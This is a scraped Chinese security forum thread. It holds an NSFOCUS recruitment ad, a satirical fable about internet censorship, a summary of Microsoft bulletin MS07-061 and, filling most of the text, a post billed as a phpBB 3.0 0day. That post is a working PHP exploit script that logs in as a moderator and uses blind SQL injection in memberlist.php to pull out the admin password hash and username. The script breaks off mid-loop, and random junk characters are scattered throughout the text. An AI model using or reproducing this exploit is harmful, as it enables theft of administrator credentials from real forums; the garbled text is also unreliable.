最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 绿盟科技(杭州办事处)招聘WEB安全测试/安全研究工程师

  • 招聘职位: 网络安全测试工程师
  • 公司名称: 绿盟科技
  • 工作地点: 江苏
  • 专业要求: 其他 
  • 学历要求: 文盲
  • 工作经验: 2年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.nsfocus.com
  • 简历邮箱: wangtuo@nsfocus.com
  • 联系电话: 114
  • 在线QQ: 10000
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++绿盟科技相关说明++++++++++

    招聘职位:WEB安全测试/安全研究攻城师7 z2 T( `  P' @" n) d
    人数:4人9 @0 W# V' W! J; c- U
    工作地点:杭州
    # [5 o& h# k" C截止日期:2012年8月30日
    9 S' R9 S3 [# K! I学历要求:本科或以上均可  b. y4 h% f# U3 o  ^
    岗位要求:
    " T, j- x! w, L7 N# u1. 熟悉ASP/.NET/java/php等常见web代码;
    * w5 V' g* b" D5 G7 c2. 精通或熟悉掌握php/perl/python/javascript/shell等一种或多种脚本语言;
    ; F0 v: `8 d/ J3. 熟悉主流的Web安全技术,包括SQL注入,XSS,CSRF等安全风险;" g: y( c* d1 ^2 c/ J$ O7 L, o
    4. 熟悉国内外主流WEB安全产品、工具,如:APPScan、Inspect、wvs等Web扫描工具;
    " f, H3 ?& u, V8 c$ A" N5. 2年以上web安全工作经验,对web安全测试有自己的理解;5 D0 w- H2 t, |
    6. 熟悉常见攻击和防御办法,熟悉web安全和渗透技术,能自行进行web渗透测试,WEB代码漏洞挖掘和分析。
    ( j! Y; y& y% w# `具备以下相关条件者将优先考虑:
    . i$ S8 @& P9 \* A3 M+ `! T9 D+ Y1.熟悉涉密信息系统以及相关技术要求;7 w9 ^9 ^/ ], ~6 w& Y! N& n
    2.熟悉防病毒、防火墙、VPN、入侵检测、漏洞扫描等信息安全系统工作原理及主流产品;
    5 [7 [3 K9 j" b' {* S! @% N3 n3.熟练使用Linux操作系统,了解内核安全机制;
    1 T) l5 N3 a8 p# t4.有内网渗透经验,擅于独立挖掘web安全漏洞;5 x; g+ E0 I$ t  _% v( h/ y  S9 P
    5.对等级保护标准、评估流程等非常熟悉的优先;
    - d2 H* h, [6 P  a, @7 d1 V6.对cisco、ids、ips等有一定 研究;. P% i4 k  x0 m( [
    7.一年以上信息安全工作经验;
    9 S7 L/ S! w5 R. O$ G8.具有网络、系统安全方面证书。
    & ~6 ~' v: y9 \" f# d: v/ q% `* ~9.有一定的软件编程经验和逆向分析经验优先;
    % Z; v% T' a! q' `% j6 [6 m有兴趣请发简历到wangtuo@nsfocus.com
    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:webmaster发表,本帖发表者webmaster符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者webmaster和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。

    河蟹、蜘蛛和蜗牛的故事
      河蟹:你这网备案了吗?  蜘蛛:啥,我织个网还要备案啊?  河蟹:当然要备案了,将来要是出个啥事,也能查到这是谁的网啊!  蜘蛛:……  河蟹:赶紧停下去备案,没有备案你的网就不能织,织好我也得给你剪断。  河蟹晃了晃他的两个大钳子,蜘蛛慌了神,赶紧屁颠屁颠跑去备案。蜘蛛还是第一次去这个部门,他发现该部门是一群蜗牛在负责。  好多天过去了,蜘蛛的备案还没拿到,去蜗牛那里问了好几次,都说正在处理。蜘蛛太饿了,于是偷偷织好了自己的网。  有一天早上起来,蜘蛛伸了个懒腰,去吃早餐,结果发现自己的网不见了。邻居们告诉他,河蟹二话不说,直接就把网给剪了。  蜘蛛很生气,真想找河蟹去拼命,可是想想河蟹的大钳子,还是作罢了。  好心的草泥马偷偷告诉蜘蛛,墙外边织网是不需要备案的。蜘蛛很高兴,虽然墙很高很高,他还是努力爬了过去。果然,墙外风和日丽,景色无限,重要的是没有可恶的河蟹来烦人。  可是时间长了,蜘蛛又开始有点怀念了,墙里面有些虫子美味又弱智,想起来就流口水。可惜这墙太高了,这些弱智的虫子不知道怎么飞出来。  于是蜘蛛翻过墙回来,果然不出他所料,蜗牛们已经审议通过了他的备案。蜘蛛迅速在老地方织了一张新网,墙内的虫子们真是又傻又美味啊!  有一天中午,蜘蛛突然感觉到他的网剧烈颤动,睁眼一看,一对正在xxoo的苍蝇不小心撞到了网上。蜘蛛已经吃饱了,正好正午骄阳似火烤得受不了,他笑着骂了一声“傻X”,就躲回洞里睡午觉去了。  迷糊中突然听见有人喊,蜘蛛揉着眼出来一看,原来是河蟹。  河蟹在下面指着那一对苍蝇,歇斯底里地朝他嚷:“你看看,你看看!多低俗!多色情!你有没有社会公德心啊?!你这多损害青少年身心健康你知道吗?”  说完,河蟹挥动自己的钳子,把蜘蛛的网剪了个粉碎。  蜘蛛心疼地看着被剪碎的网,心想:“我纳税养着你,你怎么能这么没人性呢。可是他又对河蟹无可奈何,一番思索之后,他和草泥马依依惜别,爬到了墙外。  蜘蛛从此过上了幸福的生活。
    2 ^/ M2 T& V  H
    人物:樱花浪子 BLOG地址:http://www.hacklu.net/
    5 K* o- x4 @: d: O3 e1 V# c' W
    0 F# u& H& L! P0 o. f
    0 N0 ~6 F9 ?8 I! Y2 r

    7 \1 ]4 K% U( Y! z9 W7 n$ ~; o- J, Q7 {
    . R: M# ?& l5 u4 d1 v

    . Z0 O4 R) |( Q2 Z0 s; d
    ; x6 q  y1 E8 c- k3 Z( @( C# H( a0 e' ~- x4 n
    0 a' r5 p5 _8 o# f' K% f
    & k- _2 `2 a2 b& I. l9 n
    $ H  ~! B( G" h" h

    4 j% B+ |/ \' @, X$ B, d' L" l! ?" q, x7 s2 @/ T$ H# x

    8 {) y  D# j# n. K& O
      J6 K) z' t, h- \) {
    " c; f8 ]. w: d! k8 W  _0 w/ \! W+ v
    : {/ T! b1 e# c
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    已经证明:此贴有意思,而且非常有意思~  
    ! S- k; y- E' S, Z4 S5 c
    3 p. E* I9 \, {" n# U" w5 c' ~" U0 G% g! Y" o
    1 `- c" @' V4 k

    4 M: E) ^$ A- L$ T9 T+ y2 \& g' n( l9 W4 P( H7 w
      ^& V6 b5 Y: ]+ L
    / l8 C7 Z! c* T, K0 P

    % [( Z  @0 J7 [
      ^, ~: W8 L; D4 o0 {5 P7 x+ C* U) `. B1 |7 H& D! g7 ~
    3 `- R+ }# e+ b: n: |7 C
    8 A% C; ]4 W# l, t! _$ Y

    . H  l; i7 L+ s
    # r0 n2 u' c- F8 W6 a5 r$ i% |- h) C/ e: L) I
    & {# u; ^) B! V5 u; i
    0 `( O' B# ?4 r* O9 Q& i% N
    ; b. X  w' c5 o: F
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    MS07-061:Windows URI处理中的远程执行代码漏洞
    发布日期: 十一月 13, 2007版本: 1.0

    ) ?6 c  N! Y3 i& Y
    摘要

    0 k. ^% x* ]3 Z) N
    此更新可消除一个公开报告的漏洞。 Windows Shell 处理传递给它的特制 URI 的方式中存在一个远程执行代码漏洞。 如果 Windows Shell 没有充分验证这些 URI,则攻击者可能利用此漏洞并执行任意代码。 Microsoft 仅识别了在使用 Internet Explorer 7 的系统上利用此漏洞的方式。但是,Windows XP 和 Windows Server 2003 的所有受支持版本中包括的 Windows 文件 Shell32.dll 中存在该漏洞。
    , @$ J9 s) N9 c% S! ]# f8 V
    建议。 Microsoft 建议用户立即应用此更新。
    * ~) f4 q+ l8 g( I+ [
    受影响的软件
    ! ^" u( H- {% Y0 E2 Z1 S3 |
    操作系统 最大安全影响 综合严重程度等级 此更新替代的公告 Windows XP Service Pack 2 远程执行代码 严重 MS06-045 Windows XP Professional x64 Edition 和 Windows XP Professional x64 Edition Service Pack 2 远程执行代码 严重 MS06-045 Windows Server 2003 Service Pack 1 和 Windows Server 2003 Service Pack 2 远程执行代码 严重 MS06-045 Windows Server 2003 x64 Edition 和 Windows 2003 Server x64 Edition Service Pack 2 远程执行代码 严重 MS06-045 Windows Server 2003 SP1(用于基于 Itanium 的系统)以及 Windows Server 2003 SP2(用于基于 Itanium 的系统) 远程执行代码 严重 MS06-045
    0 f' H: E, X* g' ]" m
    不受影响的软件

    $ y0 Q% {1 {. c% J2 u3 r9 l+ t/ j
    操作系统 Microsoft Windows 2000 Service Pack 4 Windows Vista  Windows Vista x64

    1 U: [0 A8 T7 Q
    微软的安全公告:

    5 D1 D% t& @# D  z
    http://www.microsoft.com/china/technet/security/bulletin/MS07-061.mspx
    2 w- ^$ l8 w' Z5 ]9 b
    (以上链接均连到第三方网站)
    * t3 o) G' P1 B5 G- e4 v
    ) ?* a& ^, g7 o+ B6 W  h' t
    + |& P. }; o6 z$ ], J% S$ P% d
    7 j; v* Y+ [7 h3 a: r6 `1 F. z0 n

    . c- `* F- r& v; U9 p9 i+ u& W7 k; ]0 p$ Y
    8 k. [; t( }8 u5 `) W

    1 q1 ~- I. }- J0 _/ n
    7 X$ [$ p8 H6 ^
    ; v" H, k9 d1 v
    3 k; B3 j7 f) G3 N- x4 [: s& ~- p9 `6 S$ F/ G

    . I( F: W! F8 u$ L4 G. b5 e4 Z8 }4 o0 U6 v
    ' |/ W# H% `2 ]. Q4 Z  V
    1 z6 ], q& A( o
    , @4 f0 ]4 |; D$ ^3 W4 l' e

    " n' ]8 Q' `  ]8 W5 [$ ?  F$ {6 A- |2 J. o5 p8 _
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    PHPBB 3.0 0day漏洞放出
    #!/usr/bin/php -q -d short_open_tag=on
    ; G% k1 L) W; ]& K# E! p& N<? & E3 h8 n& F/ P  V/ w% y" m9 z
    echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure& X' y7 \" Y. F: B$ k5 Z
    ";
    4 V$ D9 ~: W8 L- j2 j' oecho "by Hackerz5 hackerz5x@yahoo.com$ j" \" O0 B1 V# H* e  n( R
    "; 7 R( Z) h; r7 o" P) D
    echo "site: http://hackerz5.com- I1 f8 o( A( g# h# @& i: Q) t# W4 R& Z
    "; + D. x. ~+ A3 y/ ~! s
    echo "dork, version specific: "Powered by phpBB * 2002, 2006 phpBB Group"
    " [% Y' e$ F6 C7 G4 Z+ i- l! j4 F  s5 o
    ";
    - ~; m$ P9 S3 m/* 5 {& m  I7 \9 L0 W1 W# I
    works regardless of php.ini settings
    ( K, o1 Y: K. ~0 J/ D$ z0 wyou need a global moderator account with "simple moderator" role # Z% Y0 c1 e' y$ W) |  [
    */
    8 d) |# |# P/ }+ u' qif ($argc<5) {
      y6 C/ R* q4 Q0 e( f5 G* \echo "Usage: php ".$argv[0]." host path user pass OPTIONS
    + b9 x3 X- d# m' d1 J1 `* u; x";
    ' O% G3 R* t0 J) fecho "host: target server (ip/hostname)8 l  R( b4 l0 P
    "; 9 V3 l& R) w& e
    echo "path: path to phpbb38 J$ q) @  S& R
    ";
    ; ?# e* ^! \/ vecho "user/pass: u need a valid user account with global moderator rights$ Q2 X8 W; S. i0 Z- u: R
    ";
    ( _8 n$ h" c3 d2 k/ e3 necho "Options:$ r6 ?8 \# c: \8 c$ u8 j) K
    "; 1 W- Z7 n( D; Q9 P5 }2 R
    echo " -T[prefix] specify a table prefix different from default (phpbb_)0 r9 z2 @" d% m1 M4 O5 u2 ]0 Y
    ";
    6 [  m5 m: D% _( ^$ k2 F2 q* Iecho " -p[port]: specify a port other than 80
    9 o# E8 R2 [3 w9 \9 O9 ]5 q";
    " K3 }% ?1 F& Uecho " -P[ip:port]: specify a proxy
    6 B4 M9 l) i  t+ k/ c6 Y";
    ; N! t9 \# m6 \/ yecho " -u[number]: specify a user id other than 2 (admin)
    , C* ~0 f. x0 k"; 9 X+ P; Z0 J8 {( v; D
    echo " -x: disclose table prefix through error messages
    % e1 e* m5 c: d! M"; , |7 Q& H4 ]* c7 y/ h
    echo "Example:
    $ V$ Y0 J3 Y' \+ H: I* d2 w9 B";
    # ]+ e+ }' n5 C+ r0 G/ hecho "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u
    4 D; |$ [1 @- t7 {! L' \";
    ' n7 a+ r3 [; r. b4 D( y% o7 ~echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7
    $ ^4 l8 Z$ F% g8 o7 f"; 8 U- r( D. Z; {; h( [  p
    die;
    ' X- {5 @( ]* ?} 6 D; B  U8 \+ N! I  X. e
    error_reporting(0);
    6 M7 }0 S1 W1 K5 \* j3 ?( Wini_set("max_execution_time",0);
    ' e, I# n: B1 E; Xini_set("default_socket_timeout",5);
    " j# ?8 g  @0 a/ b; o( p( k6 mfunction quick_dump($string) ) f! u4 B) h0 T6 l  I4 K
    { # U. H. z* v, }5 B0 u4 P
    $result='';$exa='';$cont=0; % c; ]) u/ \0 ^& Y3 q, q
    for ($i=0; $i<=strlen($string)-1; $i++) , h; p, @& f; g) Q3 z7 Z( H, g
    { / F. j  p5 s$ Z9 t! E
    if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
    ; Y  b5 V# }& Z. A" q{$result.=" .";}
    4 J2 p" J9 [( s" belse " d$ m" N# X; i* r4 [
    {$result.=" ".$string[$i];}
    ; Z2 |% [' [! ~3 i  a1 M3 S& t3 ^if (strlen(dechex(ord($string[$i])))==2) 0 h/ N+ ]  q; q5 S- L" _& X: a
    {$exa.=" ".dechex(ord($string[$i]));}
    : f- x: ]% [6 I' b7 T- O( J7 [else
    / H! S1 p2 O) [4 b. Z{$exa.=" 0".dechex(ord($string[$i]));} * ^0 V, b, Y1 r% G1 |% D
    $cont++;if ($cont==15) {$cont=0; $result.="; y" m- b( G' Z3 [9 c; z
    "; $exa.="
    ( ]- u! c7 v9 p& g";} ! U/ |4 d+ z' |/ Q/ T% ], e' o4 Q
    }
    4 r! M! p  A, Y) I9 R& v3 Vreturn $exa."
    $ i! {! m, |9 o2 R! y; t".$result; . U4 ]/ G3 A/ H1 e+ V
    } ! a% [( l. J: ?2 _3 E  `! _. N0 \
    $proxy_regex = '(d{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}) ';
    2 z% _7 \# Q8 `( A- X. Kfunction sendpacketii($packet)
    2 @% I; b' r: A& ?% `; r{
    ; F  X$ \! u8 [8 g% ?2 a6 d1 I7 V7 ]global $proxy, $host, $port, $html, $proxy_regex;
    2 m7 G6 H3 d2 Eif ($proxy=='') { - B% X; {! P5 e1 @) ~) M
    $ock=fsockopen(gethostbyname($host),$port);
    * i/ J. W2 R: g5 Wif (!$ock) {
    . W9 i* [% y0 `" hecho 'No response from '.$host.':'.$port; die;
      Y. R: D6 t1 v1 Y8 E3 A) k} : a( {% m5 S" v! ^6 G
    }
    : z/ P; v) N, y  S: \4 eelse { % B( F( F1 W& y* N/ y
    $c = preg_match($proxy_regex,$proxy); 0 a) }* f- J4 k7 I
    if (!$c) {
    3 A+ g& u/ V  e# vecho 'Not a valid proxy...';die;
    6 }+ e$ `( q/ V  ?$ x} " |$ Q% X/ R# V% u0 D/ {% O
    $parts=explode(':',$proxy);
    0 c1 q" }/ T! _8 Vecho "Connecting to ".$parts[0].":".$parts[1]." proxy...
    0 w+ x$ b; |5 L3 D& p; u; H7 e: M";
    & A. ?+ n  X5 E0 i- [$ock=fsockopen($parts[0],$parts[1]); 7 k  N8 S) l6 W9 w% g9 t2 U% {
    if (!$ock) {
    0 U; l! {! ^( x- ?$ A8 T& ]; x2 n/ fecho 'No response from proxy...';die;
    0 w2 c) E) g1 Z0 J; n$ @- b; ~* k) m1 B} 9 R' R0 l; O8 [+ B. C
    } $ t9 x& b7 n% g& K( J
    fputs($ock,$packet);
    . u% o1 e# R8 |  [& cif ($proxy=='') { 9 g3 `- b2 m3 j- q+ M7 x
    $html='';
    6 T$ Y5 G/ A- E/ w: fwhile (!feof($ock)) {
    3 H9 h: }! a7 C3 Y1 w! E$html.=fgets($ock); ) q3 Z+ o6 }- o( A
    }
    4 U1 F: ~2 @. P* E( ]} ( K0 p9 V3 b/ w
    else {
    3 {6 c2 R2 O- [$html=''; / W! P3 p% z" q1 `
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$h tml))) {
    ' u& M0 F; J! F: W1 V$html.=fread($ock,1); 4 ?) |. g* g/ c; [- A7 b! O/ _! C
    } & p% F* b9 u; X$ L+ G7 R7 t
    } 4 z* @! y. ~1 f6 R2 T* K! U
    fclose($ock); . x3 S# p1 x7 }+ q& l0 |4 _
    #debug
    ; ~) x) t9 f4 l$ Y' ^2 n#echo "! I. a7 X8 j0 _/ u
    ".$html; ! [. e% E1 w( P6 I' {# ^
    } & l- `. E! {7 V+ @
    $host=$argv[1]; 6 c; X- @( P0 g4 t/ ?0 H
    $path=$argv[2]; / [7 C/ R- t/ V# o, d
    $user=$argv[3]; ' ?, g# C2 O# g& E, _% [) y0 I5 C
    $pass=$argv[4];
    ! _  k0 {8 e6 d$port=80; 2 |& Z& B; C2 `3 H- j  j5 l8 A
    $prefix="PHPBB_"; ' `' \; X$ o3 k$ W$ o, |
    $user_id="2";//admin ! B) w" O% g3 X& q; o+ Q
    $discl=0; 6 m5 T' p) L  n0 ^% s5 g# i; ]
    $proxy=""; # ?3 s* y7 H7 F& K2 ~
    for ($i=3; $i<=$argc-1; $i++){ # X* s& b! A/ Y5 z3 o. }
    $temp=$argv[$i][0].$argv[$i][1]; 4 F( y/ K+ }2 j# c7 H
    if ($temp=="-p") " R/ r9 {% f3 B4 L  f. u) L" l1 [
    {
    & g: ]2 T% ]  q0 C$port=str_replace("-p","",$argv[$i]);
      V0 U7 \  y" |' Y$ A& u3 B}
    + M+ a$ A9 k* u8 Jif ($temp=="-P")
    ! r2 a. Z' C. V, U{
    5 c. i8 W  m6 h' n( U$proxy=str_replace("-P","",$argv[$i]); / J% D' N# `% V' ]1 L
    } / d; q" v' J* p; x2 A: I
    if ($temp=="-T")
    % j; l5 i" y$ I* F- k" ^{
    . G5 A  I2 `* t, V5 r$prefix=str_replace("-T","",$argv[$i]); , y$ o$ w4 F9 u  \1 a+ A  e6 [4 {* q
    }
    & I& _9 Y8 }7 nif ($temp=="-u")
    8 T) Z$ w0 F5 ?+ X- x  ~2 i{ 1 w8 X6 m; P6 s0 @
    $user_id=str_replace("-u","",$argv[$i]); 2 h( r3 M/ \5 G- p7 i
    }   \& X( a( a- S: J8 J
    if ($temp=="-x")
    * h$ }8 h! g5 Y8 X/ p{
    8 j6 A  k+ }; j4 Y+ C5 T* F$ O$discl=1; ! V7 ]# w6 I( C* S7 i
    } 2 C) \/ |( J' {
    }
    ! r$ Q/ t2 i+ T$ y, W8 J  z6 E3 i9 y: tif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} # r% Q: T4 k6 c
    if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} . D2 R7 q$ d. S3 z: [2 ]
    $data="username=".urlencode($user);
    6 `+ H  n! y, K# n$data.="&amp;password=".urlencode($pass); % x0 c6 e5 _" H! m9 Y, a9 x
    $data.="&amp;redirect=index.php";
      v- E: `& w( S$data.="&amp;login=Login"; ! y; u8 f7 e2 ~. O
    $packet="POST ".$p."ucp.php?mode=login HTTP/1.0
    4 V0 f# {$ |% I+ `2 }7 H"; + Y. v" t$ \: z" L
    $packet.="Referer: http://$host$path/ucp.php?mode=login, ^1 A' Q! D/ @6 a% T
    "; 7 \9 \4 M$ B$ A% q, v  B
    $packet.="Content-Type: application/x-www-form-urlencoded
    - X' M+ i# K& L"; 6 p8 f. D( w7 ^8 M1 c( @& S
    $packet.="Accept-Encoding: text/plain
    & _3 E% t- U( r$ k3 N0 }8 x& w"; 9 Q, M. l$ A6 H4 j. [
    $packet.="Host: ".$host."- G9 u; k$ ~8 v$ t
    ";
    2 L, Z" f' w& i2 q: u$packet.="Content-Length: ".strlen($data)."
    * Z. U$ H/ o; @";
    3 e" c- @* O/ U  i8 W: x$packet.="Connection: Close
    4 ~% W/ X, U5 f9 u& j8 E* _: |. u1 f& _* A/ {! ?% X1 ~; ~0 W
    ";
    : E$ e1 @/ M% o: Z. f$packet.=$data;
    5 G) ]7 Y1 V" }3 w; V) F, P. _sendpacketii($packet); : X  S1 g8 ^/ k
    $cookie="";
    8 ]# U/ l+ F4 J1 `2 Q$ f$temp=explode("Set-Cookie: ",$html); / p( D% ^( f7 d% R! M3 ]( ]4 f4 `/ h  r
    for ($i=1; $i<=count($temp)-1; $i++)
    . N6 T. ^8 g( V' T2 N& p{ # i8 g& y9 g" G' K) l5 q# p4 Y' U
    $temp2=explode(" ",$temp[$i]); 0 Y! F# K* ?* @) o  C* o/ r
    $cookie.=" ".$temp2[0];
    - a& ?' a- {* C/ ^& W}
    4 ^6 u- b% k& U6 o, D1 z$ x0 o5 Q, oif (eregi("_u=1;",$cookie))   m9 I/ {8 F6 V5 R8 E
    {
    5 p2 I) u& U7 x/ R$ x+ |//echo $html."3 \+ e+ {/ i2 ]4 n# ~
    ";//debug & i4 Z3 H6 U7 Y% G
    //die("Unable to login...");
    $ |6 Y8 {: i# {5 l}
    " L% P' q  `/ `$ b3 _echo "cookie -> ".$cookie."
    0 a; g9 j- }4 V1 ^/ m, q"; 8 Z" o0 H4 Z5 [# w
    if ($discl) * Z0 n. H* K3 b6 t% e
    {
    * q; J! ^( v( g. a$sql="'suntzuuuuu";
    ) N4 V7 H) g6 Qecho "sql -> ".$sql."
    " r: l  d5 D$ ?' Z) x& P";
    & C8 u5 b/ ^+ S( l8 j( ]$sql=urlencode(strtoupper($sql)); + u) F1 W* n& P8 g% D
    $data="username="; . @4 S8 t# W! R
    $data.="&amp;icq=";
    - |1 b2 m; A9 I) h  M, c6 \/ v3 W$data.="&amp;email=";
    9 S8 s$ E6 o, y6 r- [$data.="&amp;aim=";
    8 {' }& }1 V- M. }$data.="&amp;joined_select=lt";
    ; B1 _5 }9 X& i' s$data.="&amp;joined="; # o" w- o- Z0 l; b. w
    $data.="&amp;yahoo=";
    3 G' f4 [4 j5 m6 @+ a$data.="&amp;active_select=lt"; 0 x1 V& A( s8 r$ R' Y
    $data.="&amp;active="; 2 k9 {! [# t+ q& S" s: a' t
    $data.="&amp;msn="; ( R# Z$ h; Y) \8 `
    $data.="&amp;count_select=eq";
    1 o0 e3 o2 i' H$ l. I8 A$data.="&amp;count="; / e' V2 L$ y( v2 R0 A5 U
    $data.="&amp;jabber="; 4 I2 V/ L& q6 A% N% x
    $data.="&amp;sk=c"; / b- P  W0 B- b0 [# r* _% B% \4 I$ }4 x
    $data.="&amp;sd=a"; 2 K% v9 P* R" a$ l' K
    $data.="&amp;ip=".$sql;
    & U. N" H# t. \( ~' A2 j6 U$data.="&amp;search_group_id=0";
    6 k# `7 e  j( @2 ^9 q7 ?* Z$data.="&amp;submit=Search";
    4 |1 t2 p4 @* I. X$packet="POST ".$p."memberlist.php?joined_select=lt&amp;active_selec t=lt&amp;count_select=eq&amp;sk=c&amp;sd=a&amp;ip=%5C%27&amp;form=post &amp;field=username_list&amp;mode=searchuser&amp;form=post HTTP/1.0
    3 d6 B" k) }) Z# L"; ' R/ x8 l6 X+ E! I3 y2 E/ B
    $packet.="Content-Type: application/x-www-form-urlencoded
    1 Z  a7 U; R% E/ q";
    " ]: ~  d( S) j/ `8 {5 Q$packet.="Host: ".$host."
    . j8 a4 R  R! U  G";
    6 b. ?: h/ j' [7 K$packet.="Content-Length: ".strlen($data).", s2 Z4 [/ d+ n9 e7 V
    "; 1 f( n1 D( w* r) Q; K& R1 i' Y
    $packet.="Connection: Close+ p" }% E) f8 {7 ^7 _
    "; + c' ]# ?) L  l7 y
    $packet.="Cookie: ".$cookie." & p" [9 Z( ^: G) F+ L4 B

    ; E0 u6 x9 y# J8 A, V2 F";
    . }2 N5 u' {9 B# G5 v2 l$packet.=$data; + b/ e3 E( b" E6 @1 A( O6 ~  c
    sendpacketii($packet);
    9 _4 H8 m' n! }0 U. ^if (strstr($html,"You have an error in your SQL syntax"))
    ' |' G- x# a- ^2 l; k0 o{ . d( F) [* ^5 o: {4 j# M! O, {0 y, j8 Y
    $temp=explode("posts",$html);
    0 `1 \( z: R7 ^8 _2 R$temp2=explode(" ",$temp[0]);
    4 p; T# I" e9 X$prefix=strtoupper($temp2[count($temp2)-1]); . w: Z: @, ~  c# M7 d) N( `
    echo "prefix -> ".$prefix."2 `0 \! ^8 i. e; T* M( a
    ";sleep(2); + S  m7 A! x! U! \
    }
      Q9 K" o/ O* e! G( F0 [, V/ Z}
    ' h6 y1 z% }  P$md5s[0]=0;//null $ s' [( }" F: v1 \" P4 g$ [1 V
    $md5s=array_merge($md5s,range(48,57)); //numbers 9 s  z  t$ ~: B7 G! h& b
    $md5s=array_merge($md5s,range(97,102));//a-f letters - R! e" J1 q5 {
    //print_r(array_values($md5s)); % N2 @9 I8 S* l! b% N+ M
    $j=1;$password=""; 4 w" s5 F6 G' A8 w' Y' r
    while (!strstr($password,chr(0)))
    & A& u; `7 V" [  w+ C5 ~* c; G) b{ % p. K, _8 b8 W- _$ u
    for ($i=0; $i<=255; $i++)
    2 p6 R! b$ D! U  x% {( ^; l3 I$ j{ " v1 L! {# ?% u6 U! u
    if (in_array($i,$md5s)) - X3 R7 K! W, u; F+ r; u4 z2 m8 c6 ]
    {
    $ {- L( p- D! O$sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$us er_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999"; % p  _! }4 g" _' V  N
    echo "sql -> ".$sql."1 B6 b! R6 `% G" {0 e  Z7 f$ u' k
    ";
    % x: K, @6 r1 d. A3 c7 s4 Z+ ^( E$sql=urlencode(strtoupper($sql));
    5 b1 D& _- s( r: A3 H  U+ O) d+ S$data="username="; * C( g4 l( c0 `% J4 F2 @
    $data.="&amp;icq=";
    ; ]8 ]% ?6 P" v6 r, g$data.="&amp;email="; # _" o) h# k  k, g7 C$ I
    $data.="&amp;aim=";
    0 o. l8 x, V! N5 S' ?$data.="&amp;joined_select=lt"; ) m2 k9 w; L( \2 o# e% v1 a
    $data.="&amp;joined=";
    - d8 b' A& s! S% z) @$data.="&amp;yahoo=";
    ; N2 w2 V3 ?. a+ P" @' C* j1 Q% q; m$data.="&amp;active_select=lt"; 6 N8 `: U: a3 }5 t: ~
    $data.="&amp;active=";
    ' ^; ~/ v) s. c0 X7 c$ B0 e' I# Q$data.="&amp;msn=";
    " `  M2 z* O& X1 ?( R) a$data.="&amp;count_select=eq"; " l( l7 X6 G* ?0 g: w  C) t6 b
    $data.="&amp;count="; * p8 _( d5 P. X* R$ ^2 ^2 n& Y
    $data.="&amp;jabber=";
    ' Y! v5 w: Z/ Y% N7 m$data.="&amp;sk=c"; 1 I( Q. e  [7 z- d1 l; t
    $data.="&amp;sd=a";
    5 h( t" W; y% ^. k7 [& T$data.="&amp;ip=".$sql; 1 h- k5 I$ Y' l4 C2 |4 Z
    $data.="&amp;search_group_id=0"; ! V( g8 o" }8 Q+ \  X, m, Z6 m- c
    $data.="&amp;submit=Search";
    2 V- u1 O0 O- H! c% K$ W$packet="POST ".$p."memberlist.php?joined_select=lt&amp;active_selec t=lt&amp;count_select=eq&amp;sk=c&amp;sd=a&amp;ip=%5C%27&amp;form=post &amp;field=username_list&amp;mode=searchuser&amp;form=post HTTP/1.0" E: z8 x8 o& e& N0 G; _* H
    ";   Y; c% ?5 G6 v* h5 V
    $packet.="Content-Type: application/x-www-form-urlencoded3 w+ H8 B, I3 x; F1 Z. E0 w1 J% Y
    ";
      {/ B  h0 V( x: M$packet.="Host: ".$host."4 A0 l0 R1 v- z4 c$ e( e
    "; ) m3 y4 y" W" [# P
    $packet.="Content-Length: ".strlen($data)."# y: j& X6 f& x* y: ?
    ";
    . A% o9 O2 N0 V& P$packet.="Connection: Close
    0 X1 l5 R$ C+ \$ q";
    8 R% ~/ {! L) s  U2 u$packet.="Cookie: ".$cookie."
    5 I; ?! m& x  @8 g/ v# q9 x
    ! N. ?) }. Z0 ^' \"; * H& O8 K# v$ G6 L
    $packet.=$data; 7 \/ O9 f: C' o( m1 @. ^
    sendpacketii($packet); " G7 J6 {7 ]) L
    if (!strstr($html,"No members found for this search criteria")) {$password.=chr($i);echo "password -> ".$password."[???]
    2 F* S: ?3 T* @' J' T  g";sleep(2);break;} # @6 i# q( Y  @& F
    }
    4 ^6 u3 D( _. N0 o7 V+ Yif ($i==255) {die("Exploit failed...");}
    4 D5 t- ]0 {& ]( A$ x0 `1 T& c. h}   K# k0 V3 N3 u' n  l
    $j++; 4 J- e* K( m$ b% t/ e
    } ( O" F% a( z5 Z  c4 t& v
    $j=1;$admin=""; ; L4 p; ]% w, I: C3 B* m2 k
    while (!strstr($admin,chr(0))) , A, D6 @$ A4 B0 m
    {
    * I4 G* T, P7 Bfor ($i=0; $i<=255; $i++)
    , Y; f4 ^- l. ^# B{ 0 Q+ M$ x. d' l8 A
    $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id ,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
